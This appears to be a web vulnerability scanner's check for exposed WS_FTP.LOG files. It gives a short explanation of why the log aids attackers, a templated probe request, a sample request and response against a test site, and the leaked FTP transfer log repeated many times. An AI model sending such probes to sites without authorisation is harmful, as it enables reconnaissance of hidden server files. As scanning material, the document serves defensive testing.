10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:47 B C:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:47 B C:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:47 B C:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:47 B C:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:47 B C:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:47 B C:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:47 B C:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:47 B C:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:47 B C:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:47 B C:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:47 B C:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:47 B C:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
WS_FTP Log (ws_ftp.log)WS_FTP is a popular FTP client for Windows. Many system administrators and developers use it to upload and download files from web servers. When WS_FTP either uploads or downloads files, it leaves a file called 'ws_ftp.log' in every directory that is accessed on the server. This file contains records of every file that is accessed by WS_FTP. This is very valuable information to an attacker because it may list files that are otherwise "hidden." This often includes administrative or maintainence applications, web application configuration files, applications-in-development, backed-up application source code and possible application data files.GET /<attack>WS_FTP.LOG</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
2\d\d |40[1]GET /WS_FTP.LOG HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:34:11 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Fri, 19 Oct 2001 03:56:38 GMT
ETag: "b4a382d5258c11:8f6"
Content-Length: 480230
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
